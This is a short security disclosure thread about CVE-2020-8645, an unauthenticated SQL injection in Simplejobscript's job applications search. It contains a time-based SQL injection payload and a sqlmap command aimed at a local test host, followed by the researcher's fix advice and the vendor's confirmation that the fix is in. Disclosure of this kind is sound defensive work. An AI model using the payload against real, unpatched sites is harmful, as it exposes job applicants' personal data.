[security] CVE-2020-8645, SQL injection in job applications search function

[gwen001]

Description: An issue was discovered in Simplejobscript.com SJS through 1.66. There is an unauthenticated SQL injection via the job applications search function. The vulnerable parameter is job_id. The function is getJobApplicationsByJobId(). The file is _lib/class.JobApplication.php.

Environment:

Version: 1.64
OS: Ubuntu 16.10
Web server: Apache 2.4.18
PHP: 5.6.40
Database: MySQL 5.7.28
URL: /get_job_applications_ajax.php
Payload: job_id=493+AND+(SELECT+9069+FROM+(SELECT(SLEEP(5)))Ufmy)

Steps to Reproduce:
$ sqlmap --batch --threads=10 --dbms=mysql -u "http://local.simplejobscript.net/get_job_applications_ajax.php" --data="job_id=493" --banner

PoC:

[gwen001]

For that one, I recommend to cast int() the vulnerable parameter.

Also would be great to check that the job_id provided belong to the connected user. For now every user, even not authenticated, can retrieve all applications by looping through that number, which is basically what we call an IDOR.

Best regards.

[niteosoft]

Thank you for submitting the issue. We have typecasted the job_id as an integer as you suggested.

[gwen001]

Great job!